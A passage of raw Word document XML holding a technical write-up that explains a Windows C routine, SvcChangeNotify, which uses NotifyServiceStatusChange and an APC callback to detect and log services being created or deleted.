      <w:r w:rsidR="001D2799">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>that stores a so call security definition for creating an event.</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secAttribute.nLength =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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>SECURITY_ATTRIBUTES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</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secAttribute.lpSecurityDescriptor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secAttribute.bInheritHandle = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</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notifyEventHandle </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 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateEventEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;secAttribute, </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CREATE_EVENT_INITIAL_SET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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EVENT_ALL_ACCESS</w:t>
      </w:r>
      <w:r w:rsidRPr="001D2799">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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1D2799" w:rsidRDefault="001D2799" w:rsidP="001D2799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C66A05" w:rsidRDefault="00C66A05" w:rsidP="001D2799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>SvcChangeNotify calls OpenSCManager to get a SCM handle</w:t>
      </w:r>
      <w:r w:rsidR="004D43D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the “desire access” is SC_MANAGER_ENUMERATE_SERVICE for SCM handle has a permission to enumerate Windows Services.</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while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) {</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scManagerHandle = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>OpenSCManager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>SC_MANAGER_ENUMERATE_SERVICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</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(scManagerHandle == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) {</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L"Cannot open SC Manager ! \n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</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C66A05" w:rsidRDefault="00C66A05" w:rsidP="00C66A05">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565A7" w:rsidRDefault="002565A7" w:rsidP="00C66A05">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D43D6" w:rsidRDefault="00C66A05" w:rsidP="004D43D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">SvcChangeNotify then calls NotifyServiceStatusChange, a Windows API for notifying any change happened to SCM. </w:t>
      </w:r>
      <w:r w:rsidR="004D43D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>NotifyServiceStatusChange takes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D43D6" w:rsidRDefault="004D43D6" w:rsidP="004D43D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The SCM handle </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D43D6" w:rsidRDefault="004D43D6" w:rsidP="004D43D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A DWORD value which is SERVICE_NOTIFY_CREATED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> xor SERVICE_NOTIFY_DELETED indicates that NotifyServiceStatusChange will monitor any service which is created or deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C66A05" w:rsidRPr="004D43D6" w:rsidRDefault="004D43D6" w:rsidP="004D43D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D43D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A pointer to notifyBuffer, which is a struct object for storing information about the event handle, the callback context </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D43D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D43D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the pointer to the callback function to be executed when events happen.</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dwResult = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NotifyServiceStatusChangeW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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scManagerHandle, </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SERVICE_NOTIFY_CREATED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</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SERVICE_NOTIFY_DELETED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C66A05" w:rsidRDefault="00C66A05" w:rsidP="00C66A05">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&amp;notifyBuffer);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00C66A05">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4D43D6" w:rsidRDefault="004D43D6" w:rsidP="004D43D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">NotifyCallback is a function which is executed when an event happened. SvcChangeNotify calls NotifyServiceStatusChange, this function </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> NotifyCallback to a APC queue which is executed next time NotifyServiceStatusChange is called again. SvcChangeNotify then calls WaitForSingleObject to wait for any event happen, and the thread will be halt until any event is capture by WaitForSingleObject. When an event happens, WaitForSingleObject return control to the thread, a while loop then executes NotifyServiceStatusChange again, for its to execute any function in its APC queue, which is NotifyCallback.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while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;notifyBuffer, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(SERVICE_NOTIFYW));</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notifyBuffer.dwVersion = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>SERVICE_NOTIFY_STATUS_CHANGE</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notifyBuffer.pfnNotifyCallback = &amp;NotifyCallback;</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notifyBuffer.pContext = (</w:t>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CALLBACK_CONTEXT*) pstCallbackContext;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dwResult = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NotifyServiceStatusChangeW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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scManagerHandle,</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SERVICE_NOTIFY_CREATED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">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SERVICE_NOTIFY_DELETED</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&amp;notifyBuffer);</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(dwResult == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)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Wait for Notify Callback function</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WaitForSingleObjectEx(pstCallbackContext-&gt;hNotifyEventHandler, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>INFINITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TRUE</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(dwResult == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SERVICE_NOTIFY_CLIENT_LAGGING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)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In case SCM lags</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L"Client Lagging !\n"</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Sleep(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>5);</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//End while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="004D43D6" w:rsidRDefault="002565A7"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eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D43D6" w:rsidRDefault="000D022A" w:rsidP="000D022A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NoitifyCallback processes any operation which must be taken in case an event happened.</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>VOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CALLBACK</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NotifyCallback(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PVOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>pParameter</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wchLogBuffer,</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wchTime;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D022A" w:rsidRDefault="000D022A" w:rsidP="000D022A">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PSERVICE_NOTIFYW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> notifyBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PSERVICE_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NOTIFYW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>pParameter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="000D022A">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0D022A" w:rsidRDefault="000D022A" w:rsidP="000D022A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When NotifyServiceStatusChange successfully captures an event, based on the event types, NotifyCallback alert a suitable log message.</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(notifyBuffer-&gt;dwNotificationStatus == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) {</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L"System Services Modified !\n"</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switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (notifyBuffer-&gt;dwNotificationTriggered) {</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SERVICE_NOTIFY_CREATED</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L"Service Created: "</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notifyBuffer-&gt;pszServiceNames + (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)1);</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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LOG_TYPE_SERVICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchLogBuffer);</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L"%s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchLogBuffer);</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SERVICE_NOTIFY_DELETED</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L"Service Deleted: "</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notifyBuffer-&gt;pszServiceNames);</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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LOG_TYPE_SERVICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchLogBuffer);</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L"%s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchLogBuffer);</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0D022A" w:rsidRDefault="000D022A" w:rsidP="000D022A">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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D022A" w:rsidRDefault="000D022A" w:rsidP="000D022A">
      <w:pPr>
        <w:rPr>
